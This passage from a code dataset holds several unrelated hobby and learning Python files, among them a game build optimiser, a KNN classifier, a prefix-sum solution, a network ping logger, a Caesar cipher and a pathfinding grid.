yet implemented.\n\n _WHITE_MAX = 120 # Maximum white sharpness value before we overflow into purple sharpness.\n _BASE_SHARPNESS = MaximumSharpness(100, 50, 50, 50, 50, 90, 0) # All Safi weapons start at this sharpness.\n\n _MAXIMIZED_CONFIG_REGULAR_PICKS = [ # TODO: Consider automating this definition.\n (SafiWeaponStandardUpgradeType.ATTACK, 5),\n (SafiWeaponStandardUpgradeType.AFFINITY, 5),\n (SafiWeaponStandardUpgradeType.SHARPNESS, 5),\n (SafiWeaponStandardUpgradeType.SLOT, 5),\n ]\n\n _MAXIMIZED_CONFIG_LEVEL_6_PICKS = [ # TODO: Consider automating this definition.\n (SafiWeaponStandardUpgradeType.ATTACK, 6),\n (SafiWeaponStandardUpgradeType.AFFINITY, 6),\n (SafiWeaponStandardUpgradeType.SHARPNESS, 6),\n (SafiWeaponStandardUpgradeType.SLOT, 6),\n ]\n\n _MAXIMIZED_CONFIG_SET_BONUS_PICKS = [(x, 1) for x in SafiWeaponSetBonusUpgradeType]\n\n def __init__(self):\n self._config = []\n assert self._state_is_valid()\n return\n\n def copy(self):\n new = copy(self)\n new._config = copy(self._config)\n assert new._state_is_valid()\n return new\n\n def get_config(self):\n return copy(self._config)\n\n def get_serialized_config(self):\n assert self._state_is_valid()\n json_serializable = [(upgrade_type.name, level) for (upgrade_type, level) in self._config]\n return json.dumps(json_serializable)\n\n def calculate_contribution(self):\n assert self._state_is_valid() # We rely on these assumptions. E.g. only one set bonus upgrade.\n\n added_attack_power = 0\n added_raw_affinity = 0\n extra_decoration_slot_level = 0\n added_sharpness_value = 0 # We turn this into new_max_sharpness_values once we have it.\n set_bonus = None\n\n for (upgrade_type, level) in self._config:\n if upgrade_type is SafiWeaponStandardUpgradeType.ATTACK:\n added_attack_power += self._ATTACK_VALUES[level - 1]\n elif upgrade_type is SafiWeaponStandardUpgradeType.AFFINITY:\n added_raw_affinity += self._AFFINITY_VALUES[level - 1]\n elif upgrade_type is SafiWeaponStandardUpgradeType.SLOT:\n extra_decoration_slot_level += self._SLOT_VALUES[level - 1]\n elif upgrade_type is SafiWeaponStandardUpgradeType.SHARPNESS:\n added_sharpness_value += self._SHARPNESS_VALUES[level - 1]\n elif isinstance(upgrade_type, SafiWeaponSetBonusUpgradeType):\n assert set_bonus is None\n set_bonus = SetBonus[upgrade_type.value.set_bonus_name]\n else:\n raise RuntimeError(\"Not a valid Safi upgrade type.\")\n \n # Now, we calculate sharpness\n\n assert SHARPNESS_LEVEL_NAMES[5] == \"White\"\n assert SHARPNESS_LEVEL_NAMES[6] == \"Purple\"\n assert len(SHARPNESS_LEVEL_NAMES) == 7\n white_value = self._BASE_SHARPNESS[5] + added_sharpness_value\n purple_value = 0\n if white_value > self._WHITE_MAX:\n purple_value = white_value - self._WHITE_MAX\n white_value = self._WHITE_MAX\n\n new_max_sharpness_values = MaximumSharpness(\n self._BASE_SHARPNESS[0],\n self._BASE_SHARPNESS[1],\n self._BASE_SHARPNESS[2],\n self._BASE_SHARPNESS[3],\n self._BASE_SHARPNESS[4],\n white_value,\n purple_value,\n )\n\n # We've calculated everything, so now we return.\n\n ret = WeaponUpgradesContribution (\n added_attack_power = added_attack_power,\n added_raw_affinity = added_raw_affinity,\n extra_decoration_slot_level = extra_decoration_slot_level,\n new_max_sharpness_values = new_max_sharpness_values,\n set_bonus = set_bonus,\n )\n return ret\n\n def get_maximized_configs(self):\n maximized_configs = []\n\n it = product(\n self._MAXIMIZED_CONFIG_LEVEL_6_PICKS,\n self._MAXIMIZED_CONFIG_REGULAR_PICKS,\n self._MAXIMIZED_CONFIG_REGULAR_PICKS,\n self._MAXIMIZED_CONFIG_REGULAR_PICKS, # TODO: Make it so slot upgrades only work\n self._MAXIMIZED_CONFIG_REGULAR_PICKS + self._MAXIMIZED_CONFIG_SET_BONUS_PICKS,\n )\n for tup in it:\n config = list(tup)\n if self._is_valid_configuration(config):\n maximized_configs.append(config)\n\n return maximized_configs\n\n def update_with_config(self, selected_config):\n self._config = copy(selected_config)\n assert self._state_is_valid()\n return\n\n def update_with_serialized_config(self, serialized_config):\n json_parsed_config = json.loads(serialized_config)\n\n self._config = []\n for (upgrade_type_str, level) in json_parsed_config:\n if upgrade_type_str in SafiWeaponStandardUpgradeType.__members__:\n upgrade_type = SafiWeaponStandardUpgradeType[upgrade_type_str]\n elif upgrade_type_str in SafiWeaponSetBonusUpgradeType.__members__:\n upgrade_type = SafiWeaponSetBonusUpgradeType[upgrade_type_str]\n else:\n raise RuntimeError(\"Unknown Safi upgrade type.\")\n self._config.append((upgrade_type, level))\n\n assert self._state_is_valid() # We test for config validity here.\n return\n\n def to_str_debugging(self):\n return \",\".join(f\"{k.name}_{v}\" for (k, v) in self._config)\n\n def _state_is_valid(self):\n if len(self._config) > 5 or (not self._is_valid_configuration(self._config)):\n return False\n\n for (upgrade_type, level) in self._config:\n if not (isinstance(upgrade_type, SafiWeaponStandardUpgradeType)\n or isinstance(upgrade_type, SafiWeaponSetBonusUpgradeType)):\n return False\n return True\n\n @classmethod\n def _is_valid_configuration(cls, config_list):\n assert len(config_list) <= 5\n\n has_slot = False\n has_set_bonus = False\n has_level_6 = False\n\n for (upgrade_type, level) in config_list:\n if upgrade_type is SafiWeaponStandardUpgradeType.SLOT:\n if has_slot:\n return False\n has_slot = True\n elif isinstance(upgrade_type, SafiWeaponSetBonusUpgradeType):\n if has_set_bonus:\n return False\n has_set_bonus = True\n elif (level > 6) or (level < 1):\n return False\n elif level == 6:\n if has_level_6:\n return False\n has_level_6 = True\n return True\n\n\nWeaponFinalValues = namedtuple(\n \"WeaponFinalValues\",\n [\n \"original_weapon\", # The original weapon object\n\n \"true_raw\",\n \"affinity\",\n \"slots\",\n \"set_bonus\",\n \"skill\",\n \"is_raw\",\n\n \"maximum_sharpness\",\n \"constant_sharpness\",\n ],\n)\n# Calculates a weapon's final values based on all selected augments and upgrades.\ndef calculate_final_weapon_values(weapon, weapon_augments_tracker, weapon_upgrades_tracker):\n assert isinstance(weapon, tuple) # TODO: Make a more specific type assertion.\n assert isinstance(weapon_augments_tracker, WeaponAugmentTracker)\n assert isinstance(weapon_upgrades_tracker, WeaponUpgradeTracker)\n\n a_contrib = weapon_augments_tracker.calculate_contribution()\n u_contrib = weapon_upgrades_tracker.calculate_contribution()\n\n bloat_value = weapon.type.value.bloat\n weapon_true_raw = weapon.attack / bloat_value\n\n slots = weapon.slots \\\n + ((a_contrib.extra_decoration_slot_level,) if (a_contrib.extra_decoration_slot_level > 0) else tuple()) \\\n + ((u_contrib.extra_decoration_slot_level,) if (u_contrib.extra_decoration_slot_level > 0) else tuple())\n assert all((x in {1,2,3,4}) for x in slots)\n\n if u_contrib.new_max_sharpness_values is not None:\n maximum_sharpness = u_contrib.new_max_sharpness_values\n else:\n maximum_sharpness = weapon.maximum_sharpness\n\n tup = WeaponFinalValues(\n original_weapon = weapon,\n\n true_raw = weapon_true_raw + a_contrib.added_attack_power + u_contrib.added_attack_power,\n affinity = weapon.affinity + a_contrib.added_raw_affinity + u_contrib.added_raw_affinity,\n slots = slots,\n set_bonus = u_contrib.set_bonus,\n skill = weapon.skill,\n is_raw = weapon.is_raw,\n\n maximum_sharpness = maximum_sharpness,\n constant_sharpness = weapon.constant_sharpness\n )\n return tup\n\n\n# Decides if w1 supercedes w2.\ndef _weapon_combo_supercedes(w1, w2):\n assert isinstance(w1, WeaponFinalValues)\n assert isinstance(w2, WeaponFinalValues)\n\n # STAGE 1: We first decide if w1 has any values less than w2.\n\n if w1.true_raw < w2.true_raw:\n return False\n if w1.affinity < w2.affinity:\n return False\n \n # The logic of this slots thing is a little complex. Here's are some examples of how it works!\n # Let's assume left is w1 and right is w2.\n # [3,3] [1] --> continue since w1 is clearly better.\n # [1] [3,3] --> return False since (1 < 3) for the first element evaluates True.\n # [4,1,1] [3,3] --> return False since (1 < 3) for the second element evaluates True.\n # To explain that last example, we can't guarantee that the [3,3] jewels can be fit into [4,1,1],\n # hence we cannot prune away w2.\n w1_slots = sorted(list(w1.slots), reverse=True)\n w2_slots = sorted(list(w2.slots), reverse=True)\n assert (len(w1_slots) == 0) or (w1_slots[0] >= w1_slots[-1]) # Sanity check that it's in descending order.\n assert (len(w2_slots) == 0) or (w2_slots[0] >= w2_slots[-1]) # Sanity check that it's in descending order.\n if any((w1_slot < w2_slot) for (w1_slot, w2_slot) in zip_longest(w1_slots, w2_slots, fillvalue=0)):\n return False\n\n # We can explain this through truth tables:\n # | w2=None | w2=setbonusA | w2=setbonusB\n # -------------|----------|--------------|--------------\n # w1=None | continue | return False | return False\n # w1=setbonusA | continue | continue | return False\n # w1=setbonusB | continue | return False | continue\n # -------------|----------|--------------|--------------\n # So, we only continue if w2 is None, or the set bonuses are the same.\n if (w2.set_bonus is not None) and (w1.set_bonus is not w2.set_bonus):\n return False\n\n # For now, we just group everything by whether they are raw or not.\n # Any pair where one is raw and one isn't cannot supercede each other.\n if w1.is_raw != w2.is_raw:\n return False\n\n # We just return if any sharpness level in w1 has fewer hits than in w2.\n assert len(w1.maximum_sharpness) == len(w2.maximum_sharpness)\n if any((s1 < s2) for (s1, s2) in zip(w1.maximum_sharpness, w2.maximum_sharpness)):\n return False\n\n # STAGE 2: We now decide if w1 has anything better than w2.\n\n if w1.true_raw > w2.true_raw:\n return True\n if w1.affinity > w2.affinity:\n return True\n\n # The same as in stage 1, but the other way around!\n if any((w1_slot > w2_slot) for (w1_slot, w2_slot) in zip_longest(w1_slots, w2_slots, fillvalue=0)):\n return True\n\n # For set bonuses, let's have a look at the remaining options:\n # | w2=None | w2=setbonusA | w2=setbonusB\n # -------------|-------------|--------------|--------------\n # w1=None | continue | | \n # w1=setbonusA | return True | continue | \n # w1=setbonusB | return True | | continue\n # -------------|-------------|--------------|--------------\n # So, we will only continue now only if both weapons have the same set bonus.\n if w1.set_bonus is not w2.set_bonus:\n return True\n\n # We don't deal with is_raw. That has already been dealt with for us.\n\n # This one is also similar to stage 1, but the other way around :)\n if any((s1 > s2) for (s1, s2) in zip(w1.maximum_sharpness, w2.maximum_sharpness)):\n return True\n\n # STAGE 3: The two weapons are effectively the same.\n \n return None\n\n\n# Returns a list of tuples (weapon, augments_tracker, upgrades_tracker)\ndef get_pruned_weapon_combos(weapon_class, health_regen_minimum):\n\n weapon_combinations = []\n\n for (_, weapon) in weapon_db.items():\n\n if weapon.type is not weapon_class:\n continue # We ignore weapons that don't match our desired weapon class.\n\n for augments_tracker in WeaponAugmentTracker.get_maximized_trackers(weapon, health_regen_minimum=health_regen_minimum):\n for upgrades_tracker in WeaponUpgradeTracker.get_maximized_trackers_pruned(weapon):\n precalculated_values = calculate_final_weapon_values(weapon, augments_tracker, upgrades_tracker)\n weapon_combinations.append(((weapon, augments_tracker, upgrades_tracker), precalculated_values))\n\n # Now, we prune!\n\n def left_supercedes_right(weapon1, weapon2):\n return _weapon_combo_supercedes(weapon1[1], weapon2[1])\n\n if __debug__:\n fordump_before = weapon_combinations\n\n progress = ExecutionProgress(f\"PRUNING WEAPONS -\", len(weapon_combinations), granularity=1000)\n weapon_combinations = prune_by_superceding(weapon_combinations, left_supercedes_right, \\\n execute_per_iteration=lambda : progress.update_and_log_progress(logger))\n\n if __debug__:\n fordump_after = weapon_combinations\n dump_pruned_weapon_combos(fordump_before, fordump_after, left_supercedes_right)\n\n weapon_combinations = [x[0] for x in weapon_combinations]\n return weapon_combinations\n\n\ndef get_weapon_config_humanreadable(linebegin, weapon, weapon_augments_tracker, weapon_upgrades_tracker):\n buf = []\n\n buf.append(linebegin + weapon.name)\n\n buf.append(\"\")\n for (augment, level) in weapon_augments_tracker.get_config():\n buf.append(f\"{linebegin}{augment.name} {level}\")\n # TODO: Let the tracker print itself.\n if isinstance(weapon_upgrades_tracker, IBCWeaponUpgradeTracker):\n for (stage, upgrade) in enumerate(weapon_upgrades_tracker.get_config()):\n buf.append(f\"{linebegin}Custom Upgrade: {upgrade.name} {stage+1}\")\n elif isinstance(weapon_upgrades_tracker, SafiWeaponUpgrades):\n for (upgrade, level) in weapon_upgrades_tracker.get_config():\n buf.append(f\"{linebegin}Safi Awakening: {upgrade.name} {level}\")\n return \"\\n\".join(buf)\n\n","repo_name":"simshadows/mhwi-build-search-prototype","sub_path":"src/query_weapons.py","file_name":"query_weapons.py","file_ext":"py","file_size_in_byte":36384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13125639014","text":"import numpy as np\nimport math\nfrom sklearn.metrics import f1_score\n\n\ndef load_data(fname,delimiter,dtype=None):\n data=np.genfromtxt(fname,dtype,delimiter=delimiter)\n X=data[1:,2:] # 以逗号为分隔,前面为行,后面为列\n Y=data[1:,1]\n m=len(Y) # 样本数\n return X,Y,m\n\ndef computeDistance(train_setX,train_setY,test_data):\n di=np.diag_indices(len(train_setX)) # 生成数组对角线索引元组\n\n distance = np.zeros(train_setX.shape)\n for j in range(len(train_setX)):\n distance[j]=train_setX[j]-test_data\n distance2=np.dot(distance,np.transpose(distance))[di]\n distance2=np.sqrt(distance2)\n distance2=np.hstack((distance2.reshape(-1,1),train_setY.reshape(-1,1))) # 将距离向量和训练集Y向量合并(向量转置用reshape,用transport无效)\n sort_indices=np.argsort(distance2[...,0]) # 以距离列向量的值排序得到排序后的索引(高->低)\n distance2=distance2[sort_indices]\n\n return distance2\n\ndef normal_predict(sorted_distance,k,i,predict_results):\n arraytolist=sorted_distance[:k,1].tolist()\n types=set(arraytolist) # 罗列出列表中不同的元素\n dict={} # 利用字典统计出不同元素的个数\n\n for item in types:\n dict.update({item:arraytolist.count(item)})\n print(dict)\n\n try:\n if dict[b'B']>dict[b'M']:\n result = 'B'\n else:\n result = 'M'\n except KeyError as e:\n if b'B' in types:\n result = 'B'\n else:\n result = 'M'\n\n print('测试样本{}的预测结果为:{}'.format(i,result))\n predict_results[i]=(result)\n\ndef computePerformance(test_setY,predict_results):\n print(\"\\nF1分数={}\".format(f1_score(test_setY, predict_results, average='micro')))\n\nif __name__==\"__main__\":\n X,Y,m=load_data(\"Breast Cancer_data.csv\",\",\")\n temp = math.ceil(m * 3 / 4)\n train_setX = X[:temp]\n test_setX = X[temp + 1:]\n train_setY = Y[:temp]\n test_setY = Y[temp + 1:]\n train_setX = train_setX.astype(np.float_) # 把bytes数据类型转换为float64\n test_setX = test_setX.astype(np.float_)\n\n predict_results = [0]*len(test_setY) # 对测试集的预测结果(生成固定长度的列表)\n\n for i in range(test_setX.shape[0]): # 对测试集逐个预测\n sorted_distance=computeDistance(train_setX,train_setY,test_setX[i])\n normal_predict(sorted_distance,7,i,predict_results)\n\n test_setY=test_setY.tolist()\n test_setY=[str(i,encoding = \"utf-8\") for i in test_setY] # bytes转str\n\n # 计算性能\n computePerformance(test_setY,predict_results)\n","repo_name":"AnRanbel/ML","sub_path":"KNN/BreastCancerPrediction.py","file_name":"BreastCancerPrediction.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8809797544","text":"'''\n날짜: 2022.09.29\n시간복잡도: O(N^2)\n\n문제: https://www.acmicpc.net/problem/11660\n풀이방식: \n20:25 ~ 20:59\n\nn범위가 작으니 부분합 표 만들어 두자\nD[i][j] = D[i-1][j] + D[i][j-1] - D[i-1][j-1] + A[i-1][j-1]\n\n테스트\n4 3\n1 2 3 4\n2 3 4 5\n3 4 5 6\n4 5 6 7\n2 2 3 4\n3 4 3 4\n1 1 4 4\n'''\nimport sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\n# 1. 맵입력\narr = []\nfor _ in range(n):\n arr.append(list(map(int, input().split())))\n# 2. 부분합 맵 입력 \nnumbers = [[0] * (n+1) for _ in range(n+1)]\nfor i in range(1, n+1): # D[i][j] = D[i-1][j] + D[i][j-1] - D[i-1][j-1] + A[i-1][j-1]\n for j in range(1, n+1):\n numbers[i][j] = numbers[i-1][j] + numbers[i][j-1] - numbers[i-1][j-1] + arr[i-1][j-1]\n# print(numbers)\n# print()\n# 3. 타겟부위 합\nfor i in range(m): # D[x2][y2] - D[x1-1][y2] - D[x2][y1-1] + D[x1-1][y1-1]\n x1,y1,x2,y2 = list(map(int, input().split()))\n \n print(numbers[x2][y2] - numbers[x1-1][y2] - numbers[x2][y1-1] + numbers[x1-1][y1-1])\n\n\n","repo_name":"Minsik113/Algorithm-practice","sub_path":"[Book1]Doit_Algorithm_Codingtest/01-구간합/004-구간 합 구하기2.py","file_name":"004-구간 합 구하기2.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22990240235","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport json\nimport time\nimport subprocess\nfrom pathlib import Path\nfrom datetime import datetime\n\n\n# Config data for the application\ndata = {}\n\n\ndef main():\n\n # load configuration\n load_config()\n\n\n # Verify that the script is not running yet\n is_running = is_already_running()\n if is_running:\n sys.exit(0)\n\n\n # Ping Google's DNS server.\n result = ping_server()\n\n if not result:\n\n retries = 0\n\n while not result:\n\n # Increment the amount of retries.\n retries += 1\n\n # Log the failure\n log_failure(retries)\n\n # Wait 2 seconds ...\n time.sleep(2)\n\n # Retry to ping it\n result = ping_server()\n\n\ndef load_config():\n\n here = os.path.dirname(os.path.realpath(__file__))\n\n config_file_full_path = f\"{here}/config.json\"\n\n\n with open(config_file_full_path) as config_file:\n config = json.load(config_file)\n data[\"script_name\"] = config[\"script_name_per_minute\"]\n data[\"google_server\"] = config[\"google_server\"]\n data[\"pings_log_file\"] = f\"{config['root_dir']}/{config['pings_log_file']}\"\n\n\ndef is_already_running():\n\n # Get the current script's pid.\n pid = str(os.getpid())\n\n # Get the full list of process IDs for scripts with the same name.\n command = f\"ps -ef | grep -v grep | grep {data['script_name']}\"\n raw_processes = list(os.popen(command))\n\n filtered_list = []\n\n for raw_process in raw_processes:\n process_id = str(raw_process).split()[1]\n if process_id != pid:\n filtered_list.append(process_id)\n\n\n # Return the amount of process IDs\n return len(filtered_list) > 0\n\n\ndef ping_server():\n\n # Set the ping command.\n ping_command = f\"/sbin/ping -c 1 {data['google_server']}\"\n\n # Set the shell command wrapper.\n process = subprocess.Popen(ping_command, stdout = subprocess.PIPE, stderr = subprocess.DEVNULL, shell = True)\n\n # Launch the shell command:\n process.communicate()\n\n # Get the command's exit status.\n exit_status = process.returncode\n\n return exit_status == 0\n\n\ndef get_last_modified(log_file):\n\n if not os.path.isfile(log_file):\n Path(log_file).touch()\n\n raw_file_date = time.ctime(os.path.getmtime(log_file))\n\n file_date_array = raw_file_date.split()\n\n # Add a 'zero' in case that the date is lower than 10\n dom = file_date_array[2]\n\n day_of_month = int(dom)\n\n if day_of_month < 10:\n dom = \"0\" + dom\n\n file_date = f\"{file_date_array[4]}/{file_date_array[1]}/{dom}\"\n\n # Convert the date from string to number\n file_date = file_date.replace(\"Jan\", \"1\")\n file_date = file_date.replace(\"Feb\", \"2\")\n file_date = file_date.replace(\"Mar\", \"3\")\n file_date = file_date.replace(\"Apr\", \"4\")\n file_date = file_date.replace(\"May\", \"5\")\n file_date = file_date.replace(\"Jun\", \"6\")\n file_date = file_date.replace(\"Jul\", \"7\")\n file_date = file_date.replace(\"Aug\", \"8\")\n file_date = file_date.replace(\"Sep\", \"9\")\n file_date = file_date.replace(\"Oct\", \"10\")\n file_date = file_date.replace(\"Nov\", \"11\")\n file_date = file_date.replace(\"Dec\", \"12\")\n\n return file_date\n\n\ndef log_failure(retries):\n\n log_file = data[\"pings_log_file\"]\n\n # \"Touch\" the file, if absent.\n if not os.path.exists(log_file):\n open(log_file, 'a').close()\n os.chmod(log_file, 0o1232) # 0666 in decimal\n\n # Get the formatted 'last modified' date for the log file.\n last_modified = get_last_modified(log_file)\n\n # Get the current date\n current_date = datetime.now().strftime(\"%Y/%m/%d\")\n\n with open(log_file, \"a\") as log:\n if not current_date == last_modified:\n log.write(\"-\" * 60)\n log.write(\"\\n\")\n\n now = datetime.now().strftime(\"%Y/%m/%d_%H:%M:%S\")\n log.write(f\"{now} - Try #{retries}\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yargolan/GolanSoft","sub_path":"Apps/Connectivity/ping_google_DNS_server.py","file_name":"ping_google_DNS_server.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5420316848","text":"# This script can be used to configure a nrf52840dk that is flashed with the radio_test program\n# to send rssi packets with the provided configuration.\n# This script is supposed to be used in tandem with the rx.py\n\nimport serial\nimport nrf52840 as nrf\n\npackages = 1000 # nr of packages to be sent per transmission\n\n\ndef main():\n port = nrf.prompt_for_serial_port()\n with serial.Serial() as ser: # ensures opened port will be closed when leaving scope\n ser.baudrate = nrf.baudrate\n ser.port = port\n ser.open()\n\n # configure options that will not change\n nrf.configure_start_channel(ser)\n nrf.configure_transmit_pattern(ser)\n ser.flush() # flush the data buffer over to the serial port\n for i in range(0, 4):\n print(ser.readline().decode())\n\n while True: # loop until no more transmission shall be performed\n # configure options that need to be adjusted for every run\n nrf.configure_output_power(ser)\n nrf.configure_data_rate(ser)\n ser.flush()\n for i in range(0, 4):\n print(ser.readline().decode())\n\n while input(\"start transmission? (y, n) \") == \"y\": # start transmission with current configuration\n nrf.start_tx(ser, packages)\n ser.flush()\n\n line = ser.readline().decode()\n while line.find(\"TX has finished\") == -1: # wait till transmission has finished\n print(line)\n line = ser.readline().decode()\n print(line)\n\n if input(\"configure next transmission? (y, n) \") != \"y\":\n break\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"blazing-panda/nrf52840-radio-test-scripts","sub_path":"src/tx.py","file_name":"tx.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12280833663","text":"\n#Programa para a verificar se um número inteiro é positivo ou negativo, retornando um erro caso o usuario digite um valor inválido\n\nnumero = input(\"Digite um numero inteiro: \")\ntry:\n inum = int(numero)\nexcept:\n print(\"Digite um valor inteiro válido\")\n quit()\nif inum > 0:\n print(f\"O numero {inum} é positivo\")\nelif inum == 0:\n print(\"Igual a zero.\")\nelse:\n print(f\"o Número {inum} é negativo\")\n\n ","repo_name":"N0tH3r0/Programas-avulsos","sub_path":"Verificador de sinal.py","file_name":"Verificador de sinal.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15114848199","text":"from itertools import product\r\nn,a,b,c = map(int,input().split())\r\nl = [int(input()) for i in range(n)]\r\nx = list(product([0, 1, 2, 3], repeat=n))\r\nans = 10**10\r\nfor i in range(len(x)):\r\n if x[i].count(1) == 0 or x[i].count(2) == 0 or x[i].count(3) == 0:\r\n continue\r\n tmpa = 0\r\n tmpb = 0\r\n tmpc = 0\r\n for j in range(n):\r\n if x[i][j] == 1:\r\n tmpa += l[j]\r\n if x[i][j] == 2:\r\n tmpb += l[j]\r\n if x[i][j] == 3:\r\n tmpc += l[j]\r\n tmpans = abs(a-tmpa)+abs(b-tmpb)+abs(c-tmpc)\r\n tmpans += (x[i].count(1)-1)*10 + (x[i].count(2)-1)*10 + (x[i].count(3)-1)*10\r\n ans = min(ans,tmpans)\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc119/C/4915372.py","file_name":"4915372.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"50563235","text":"import re, os, shutil\n\nrg = re.compile(r\"^(.*?)(\\d)(\\d)(\\d)(.*?)$\") # 3桁の連番\n\n# 現在のフォルダ内の全てのファイルを探索\nser_num = 1\nfor filename in os.listdir('.'):\n mo = rg.search(filename)\n\n # 正規表現と一致しなければスキップ\n if mo == None:\n continue\n\n before_part = mo.group(1)\n after_part = mo.group(5)\n # ファイル名が一致しなければスキップ\n if not(filename.startswith(before_part) and filename.endswith(after_part)):\n continue\n\n dig1 = int(mo.group(4))\n dig2 = int(mo.group(3))\n dig = -1\n new_name = ''\n # 連番が1桁の場合\n if 1 <= ser_num <= 9:\n if dig1 != ser_num:\n dig = ser_num\n new_name = before_part + '00' + str(ser_num) + after_part\n # print(new_name)\n # 連番が2桁の場合\n elif 10 <= ser_num <= 99:\n dig = str(dig2) + str(dig1)\n print(dig)\n if int(dig) != ser_num:\n dig = ser_num\n new_name = before_part + '0' + str(ser_num) + after_part\n # print(new_name)\n\n ser_num += 1\n # ファイルネームを更新\n if dig != -1:\n # print(f\"ファイル名を{filename}から{new_name}に変更します。\")\n shutil.move(filename, new_name)\n","repo_name":"Shinpei2/python_source","sub_path":"automation/chapter9/9.7.3/c9.7.3.py","file_name":"c9.7.3.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15250986409","text":"def lg2(x):\r\n i = 0\r\n while x >= 2**i:\r\n i += 1\r\n return i-1\r\n\r\nfor tc in range(1, int(input())+1):\r\n N, K = list(map(int,input().split()))\r\n N += 1\r\n Kpow = 2**(lg2(K)+1)\r\n v = Kpow - K - 1\r\n ans = (N + v)//(2**lg2(K))\r\n print (\"Case #%d: %d %d\"%(tc,(ans-1)//2, (ans-2)//2))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/17/03/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"72831046953","text":"from cryptography.fernet import Fernet\nimport cryptography\n\n\ndef encrypt(plain, key):\n text = \"\"\n for char in plain:\n if (char.isupper()):\n if char.isalpha() == False:\n text +=\" \"\n else:\n text += chr((ord(char) + key-65) % 26 + 65)\n else:\n if char.isalpha()== False:\n text +=\" \"\n else:\n text += chr((ord(char) + key - 97) % 26 + 97)\n return text\n\n\ndef decrypt(encoded, key):\n return encrypt(encoded, -key)\n\n\ndef crack(message):\n key = Fernet.generate_key()\n fernet = Fernet(key)\n encrypt_message = fernet.encrypt(message.encode())\n print(\"original string: \", message)\n print(\"encrypted string: \", encrypt_message)\n decrypt_message = fernet.decrypt(encrypt_message).decode()\n \n return( decrypt_message )\n\n\nif __name__ == \"__main__\":\n \n print(encrypt(\"zzz\",1))\n crack(\"abc\")\n","repo_name":"ahmadabudames/caesar-cipher","sub_path":"caesar_cipher/caeser_cipher.py","file_name":"caeser_cipher.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16617406872","text":"# A palindromic number reads the same both ways. \n# The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.\n\n# Find the largest palindrome made from the product of two 3-digit numbers.\n\ndef is_palindrome(num):\n strng = str(num)\n str_len = len(strng)\n for i in range(int(str_len/2)+1):\n if strng[i] != strng[str_len-i-1]:\n return False\n return True\n\ndef largest_palindrome_product(num):\n highest_n_digit = int(num * str(9))\n lowest_n_digit = 10 ** (num-1)\n max_num = 0\n for i in range(highest_n_digit,lowest_n_digit+1,-1):\n for j in range(i,lowest_n_digit+1,-1):\n num = i*j\n if(is_palindrome(num)):\n max_num = num if num > max_num else max_num\n \n return max_num\n \ndef main():\n num = int(input(\"Please enter a number digits to find the larges palindrome product :\"))\n print(largest_palindrome_product(num))\n\nif __name__ == '__main__':\n main()\n","repo_name":"azharahamed/my-first-python-learning","sub_path":"projecteuler/largest_palindrome_product.py","file_name":"largest_palindrome_product.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3121921669","text":"import pygame\nfrom cell import Cell\n\nclass Grid:\n\tdef __init__(self, screenWidth, screenHeight, cellSize, startX, startY, endX, endY):\n\t\tself.cellSize = cellSize\n\t\tself.nbCol = int(screenWidth / cellSize)\n\t\tself.nbRow = int(screenHeight / cellSize)\n\n\t\tself.grid = [[Cell(x, y) for x in range(self.nbCol)] for y in range(self.nbRow)]\n\t\tself.grid[startX][startY].setStart()\n\t\tself.grid[endX][endY].setEnd()\n\n\tdef getCell(self, x, y):\n\t\treturn self.grid[int(y)][int(x)]\n\n\tdef handleLeftClick(self, x, y):\n\t\tself.getCell(x / self.cellSize, y / self.cellSize).setWall()\n\n\tdef handleRightClick(self, x, y):\n\t\tself.getCell(x / self.cellSize, y / self.cellSize).setFree()\n\n\tdef draw(self, screen):\n\t\tfor row, cells in enumerate(self.grid):\n\t\t\tfor col, cell in enumerate(cells):\n\t\t\t\trect = pygame.Rect(col * self.cellSize, row * self.cellSize, self.cellSize - 1, self.cellSize - 1)\n\t\t\t\tpygame.draw.rect(screen, cell.getColor(), rect)\n\n\t\tmousePos = pygame.mouse.get_pos()\n\t\tcell = self.getCell(mousePos[0] / self.cellSize, mousePos[1] / self.cellSize)\n\t\tfont = pygame.font.SysFont('Arial', 12, bold = True)\n\t\ttext = font.render('Score: ' + str(cell.score) + ', Start: ' + str(cell.startDistance) + ', End: ' + str(cell.endDistance), True, 'Red', 'Black')\n\t\tscreen.blit(text, ((mousePos[0], mousePos[1] - text.get_height())))\n","repo_name":"WarTey/pathfinder","sub_path":"grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39401801023","text":"from pprint import pprint\n\nimport requests\n\nfrom getLol.model.Player import 